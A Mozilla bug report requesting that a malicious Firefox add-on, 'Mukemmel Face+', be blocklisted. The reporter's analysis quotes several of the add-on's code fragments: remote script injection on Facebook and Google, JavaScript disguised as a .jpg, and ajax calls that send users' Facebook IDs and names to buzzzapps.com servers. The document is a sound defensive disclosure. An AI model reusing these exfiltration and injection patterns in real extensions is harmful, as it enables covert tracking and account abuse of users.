Closed Bug 748993 Opened 13 years ago Closed 13 years ago

Malicious "Mukemmel Face+" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

defect
Not set
normal

Tracking

()

RESOLVED FIXED

People

(Reporter: mhammell, Assigned: jorgev)

Details

Attachments

(1 file)

90.12 KB, application/octet-stream
Details
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.163 Safari/535.19 Steps to reproduce: Downloaded add-on from www.mukemmelface.com/firefox.html Actual results: loads "adobeflashplayer.js" from XPI code is based on the less malicious "SocialFixer" plugin looks to see if it's on a Facebook or Google domain uses HTML5 local storage plus cookies to maintain config/state injects a <script> tag to load http://hadi.mukemmelface.com/mukemmelface.js?amtasak=<random_num> when on Facebook or, injects a <script> tag to load http://hadi.mukemmelface.com/g.js?amtasak=<random_num> when on Google mukemmelface.js: loads your public details into the DOM via a call to graph.facebook.com/<uid>&callback=cins contains the spam URL http://hadi.mukemmelface.com/reklam.html injects either a <script> tag to load http://hadi.mukemmelface.com/offline.js?cins=<1|2>&amtasak=<uid>&x=<random_number> ... or a <script> tag to load http://hadi.mukemmelface.com/zaza.js?cins=<1|2>&amtasak=<uid>&x=<random_number> and a <script> tag to load http://gator1620.hostgator.com/~vazgec/1333458695713783.jpg g.js: empty at the time the analysis was done offline.js / zaza.js (same file): JS to install a font 1333458695713783.jpg: not an image file, but javascript sends your FB UID to http://get.buzzzapps.com/xpi/lechat/get_th.php?id_user="+FB_UID+"&ck="+userKey+"&me="+FB_UID (since this loads on every Facebook page load, it also sends the current Facebook URL you're viewing as a referrer, allowing them to track you on Facebook) has the ability to send your FB UID and name to http://set.buzzzapps.com/xpi/lechat/register.php?name='+FB_NAME+'&fbid='+FB_UID sends your FB UID to http://sp1.buzzzapps.com/sp/upload.php?id_user='+FB_UID+' sends your FB UID to http://ads2.buzzzapps.com/xpi/css/'+a+'/'+FB_UID+'.css makes an Ajax request to http://cdn.mukemmelface.com/MukemmelFace.js?amtasak=<random_number> injects ads by appending to the FB ad unit via "<iframe id='"+pubid+"_fr' src='"+reklam+"?umtt="+utma+"&umte="+USER_TYPE+"&ub="+SEXE+"' style='border:0px;margin-left:0px' width='230' height='620' scrolling='no' ></iframe>" sends your name and FB UID when you submit a bug report via http://set.buzzzapps.com/xpi/lechat/bugreport.php?message="&name="+FB_NAME+&fbid="+FB_UID sends your name and FB UID to http://get.buzzzapps.com/xpi/lechat/get_all.php?id_post="+tableau_aid+"&id_user="+FB_UID+ posts details of what you do on Facebook via function setPost(aid,what){ ajaxeur("http://set.buzzzapps.com/xpi/lechat/set.php?id_post="+aid+"&id_user="+FB_UID +"&type="+what,vide, function(){}); } function unsetPost(aid,what){ ajaxeur("http://set.buzzzapps.com/xpi/lechat/unset.php?id_post="+aid+"&id_user="+FB_UID +"&type="+what,vide, function(){}); } posts status updates to your Timeline / Wall Expected results: It shouldn't post your Facebook account information to a 3rd party server or post as you on Facebook without your consent.
ID: {45147e67-4020-47e2-8f7a-55464fb535aa}
Assignee: nobody → jorge
Status: UNCONFIRMED → NEW
Ever confirmed: true
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: